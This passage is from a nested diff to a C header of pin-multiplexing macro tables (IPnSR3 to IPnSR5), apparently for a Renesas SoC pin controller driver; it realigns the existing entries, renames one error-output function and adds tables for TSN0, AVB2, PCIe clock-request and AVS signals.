+-#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)	FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR4 */
++/* IP0SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR4_3_0	FM(TSN0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_7_4	FM(TSN0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_11_8	FM(TSN0_AVTP_PPS1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_15_12	FM(TSN0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_19_16	FM(TSN0_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_23_20	FM(TSN0_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_27_24	FM(TSN0_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_31_28	FM(TSN0_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR4_3_0	FM(TSN0_AVTP_PPS0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_7_4	FM(TSN0_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_11_8	FM(TSN0_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_15_12	FM(TSN0_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_19_16	FM(TSN0_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_23_20	FM(TSN0_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_27_24	FM(TSN0_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_31_28	FM(TSN0_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR4_3_0	FM(TSN0_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_7_4	FM(TSN0_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_11_8	FM(TSN0_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_15_12	FM(TSN0_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_19_16	FM(TSN0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_23_20	FM(PCIE0_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_27_24	FM(PCIE1_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_31_28	FM(AVS0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR4_3_0	FM(AVS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR5 */
++/* IP0SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR5_3_0	FM(AVB2_AVTP_PPS)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_7_4	FM(AVB2_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_11_8	FM(AVB2_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_15_12	FM(AVB2_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_19_16	FM(AVB2_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_23_20	FM(AVB2_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_27_24	FM(AVB2_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_31_28	FM(AVB2_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR5_3_0	FM(AVB2_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_7_4	FM(AVB2_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_11_8	FM(AVB2_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
